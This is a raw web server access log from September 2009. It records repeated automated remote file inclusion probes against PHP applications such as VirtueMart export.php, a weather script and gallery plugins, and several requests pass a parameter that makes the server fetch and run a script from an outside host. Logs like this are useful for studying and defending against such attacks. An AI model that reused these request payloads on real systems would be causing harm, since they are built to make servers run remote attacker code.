69.73.185.40 - - [24/Sep/2009:02:38:19 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:38:48 -0500] "GET /logs/access_log.1235001600//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:38:52 -0500] "GET /logs/access_log.1235001600//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:39:04 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:39:12 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
122.199.140.158 - - [24/Sep/2009:02:41:24 -0500] "GET /logs/access_log.1237075200//admin/classes/errors.php?error=http://www.mdware.co.kr/bbs/data/medi8/copyright?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:46:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:46:27 -0500] "GET /logs/access_log.1250726400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:46:27 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:02:46:30 -0500] "GET /logs/access_log.1249257600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.27.203.107 - - [24/Sep/2009:02:47:11 -0500] "GET /logs/access_log.1236211200//?zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.27.203.107 - - [24/Sep/2009:02:47:11 -0500] "GET //?zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.27.203.107 - - [24/Sep/2009:02:47:12 -0500] "GET /logs//?zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 206241 "-""Mozilla/5.0"
218.27.203.107 - - [24/Sep/2009:02:47:12 -0500] "GET /logs/access_log.1247356800//?zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:02:52:57 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:02:52:57 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:02:52:57 -0500] "GET /logs/access_log.1243468800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
94.23.197.26 - - [24/Sep/2009:02:54:51 -0500] "GET /logs/index2.php?showpage=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Advanced Browser (http://www.avantbrowser.com)"
94.23.197.26 - - [24/Sep/2009:02:54:52 -0500] "GET /index2.php?showpage=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Advanced Browser (http://www.avantbrowser.com)"
94.23.197.26 - - [24/Sep/2009:02:54:52 -0500] "GET /logs/access_log.1252195200/index2.php?showpage=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Advanced Browser (http://www.avantbrowser.com)"
94.23.197.26 - - [24/Sep/2009:02:54:52 -0500] "GET /index2.php?showpage=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.197.26 - - [24/Sep/2009:02:54:52 -0500] "GET /logs/index2.php?showpage=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.197.26 - - [24/Sep/2009:02:54:52 -0500] "GET /logs/access_log.1252195200/index2.php?showpage=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
61.100.5.136 - - [24/Sep/2009:02:55:07 -0500] "GET /logs//setup.php?p=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:02:55:07 -0500] "GET /logs/access_log.1236038400//setup.php?p=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:02:55:12 -0500] "GET //setup.php?p=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:02:56:59 -0500] "GET /logs/access_log.1231891200//setup.php?p=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.39.130.23 - - [24/Sep/2009:02:57:17 -0500] "GET /lostpasswd.php?env[include_prefix]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.39.130.23 - - [24/Sep/2009:02:57:18 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.39.130.23 - - [24/Sep/2009:02:57:18 -0500] "GET /logs/access_log.1248393600/lostpasswd.php?env[include_prefix]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.39.130.23 - - [24/Sep/2009:02:57:21 -0500] "GET /logs/access_log.1238371200/lostpasswd.php?env[include_prefix]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
122.199.140.158 - - [24/Sep/2009:02:57:48 -0500] "GET /logs/access_log.1237075200//admin/classes/errors.php?error=http://www.mdware.co.kr/bbs/data/medi8/copyright?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:52 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:52 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:52 -0500] "GET /logs/access_log.1240099200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:58 -0500] "GET /logs/access_log.1250294400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:58 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:57:58 -0500] "GET /logs/access_log.1240099200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:02:58:30 -0500] "GET /logs/access_log.1231804800//setup.php?p=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:39 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:39 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:39 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:02:58:39 -0500] "GET /logs/access_log.1252022400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:40 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:40 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:02:58:40 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:02:58:40 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:40 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:44 -0500] "GET /logs/access_log.1249603200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:58:45 -0500] "GET /logs/access_log.1249603200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.115 - - [24/Sep/2009:02:58:58 -0500] "GET /logs/access_log.1250035200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.101.214.54 - - [24/Sep/2009:02:59:02 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:22 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:22 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:22 -0500] "GET /logs/access_log.1242691200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:22 -0500] "GET /logs/access_log.1242172800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:26 -0500] "GET /logs/access_log.1242691200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:26 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:26 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:02:59:26 -0500] "GET /logs/access_log.1242172800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:03:00:44 -0500] "GET /logs//index2.php?content=http://www.sh1908.org/bbs/skin/ggambo7002_pw/wondho/zfxid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:03:00:47 -0500] "GET /logs/access_log.1244764800//index2.php?content=http://www.sh1908.org/bbs/skin/ggambo7002_pw/wondho/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:03:00:47 -0500] "GET //index2.php?content=http://www.sh1908.org/bbs/skin/ggambo7002_pw/wondho/zfxid.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.184.252.3 - - [24/Sep/2009:03:01:14 -0500] "GET /logs/access_log.1250121600//index2.php?content=http://www.sh1908.org/bbs/skin/ggambo7002_pw/wondho/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.207.51 - - [24/Sep/2009:03:01:29 -0500] "GET /logs/access_log.1210809600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.123.177 - - [24/Sep/2009:03:03:24 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
211.206.123.177 - - [24/Sep/2009:03:03:24 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
94.23.197.26 - - [24/Sep/2009:03:03:25 -0500] "GET /index2.php?ascii_seite=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:03:03:25 -0500] "GET /logs/index2.php?ascii_seite=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:03:03:25 -0500] "GET /logs/access_log.1252195200/index2.php?ascii_seite=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:03:03:26 -0500] "GET /index2.php?ascii_seite=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
94.23.197.26 - - [24/Sep/2009:03:03:26 -0500] "GET /logs/index2.php?ascii_seite=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
94.23.197.26 - - [24/Sep/2009:03:03:26 -0500] "GET /logs/access_log.1252195200/index2.php?ascii_seite=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
59.24.49.35 - - [24/Sep/2009:03:03:40 -0500] "GET /?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:03:03:41 -0500] "GET /logs/access_log.1242172800/?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:03:03:43 -0500] "GET /?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:03:03:43 -0500] "GET /logs/access_log.1242172800/?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:03:03:48 -0500] "GET /logs/access_log.1233705600/?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:03:03:49 -0500] "GET /logs/access_log.1233705600/?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:03:03:52 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
59.24.49.35 - - [24/Sep/2009:03:03:52 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:06:20 -0500] "GET /logs/access_log.1250467200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:06:20 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:06:20 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:06:20 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.18.190.6 - - [24/Sep/2009:03:06:34 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.806"
217.18.190.6 - - [24/Sep/2009:03:06:34 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.806"
211.115.111.122 - - [24/Sep/2009:03:07:41 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
89.187.131.186 - - [24/Sep/2009:03:10:00 -0500] "GET /logs//impex/ImpExData.php?systempath=http://p0pper.altervista.org/bovsp.txt?&mode=id HTTP/1.1" 404 308 "-""-"
89.187.131.186 - - [24/Sep/2009:03:10:00 -0500] "GET //impex/ImpExData.php?systempath=http://p0pper.altervista.org/bovsp.txt?&mode=id HTTP/1.1" 404 303 "-""-"
188.120.32.42 - - [24/Sep/2009:03:13:58 -0500] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
188.120.32.42 - - [24/Sep/2009:03:13:58 -0500] "GET /setup.php?setup[use_category]=1&dir=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
188.120.32.42 - - [24/Sep/2009:03:13:58 -0500] "GET /logs/access_log.1249776000/setup.php?setup[use_category]=1&dir=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
188.120.32.42 - - [24/Sep/2009:03:13:58 -0500] "GET /logs/access_log.1250035200/setup.php?setup[use_category]=1&dir=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:14:21 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:14:21 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:14:21 -0500] "GET /logs/access_log.1250467200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:14:21 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
94.23.197.26 - - [24/Sep/2009:03:14:39 -0500] "GET /index.php?canal=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 292 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
94.23.197.26 - - [24/Sep/2009:03:14:39 -0500] "GET /logs/index.php?canal=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 297 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
94.23.197.26 - - [24/Sep/2009:03:14:39 -0500] "GET /logs/access_log.1252195200/index.php?canal=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 319 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
94.23.197.26 - - [24/Sep/2009:03:14:40 -0500] "GET /index.php?canal=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:03:14:40 -0500] "GET /logs/index.php?canal=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:03:14:40 -0500] "GET /logs/access_log.1252195200/index.php?canal=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 319 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
188.120.32.42 - - [24/Sep/2009:03:14:46 -0500] "GET /logs/access_log.1251504000/setup.php?setup[use_category]=1&dir=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:14:54 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:14:54 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:14:54 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:15:03 -0500] "GET /logs/access_log.1240876800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:03:15:16 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:03:15:16 -0500] "GET /logs/access_log.1243209600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:03:15:16 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:15:37 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:15:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:15:37 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:03:15:45 -0500] "GET /logs/access_log.1240876800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:03:17:18 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.101.214.54 - - [24/Sep/2009:03:17:18 -0500] "GET /logs/access_log.1252022400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
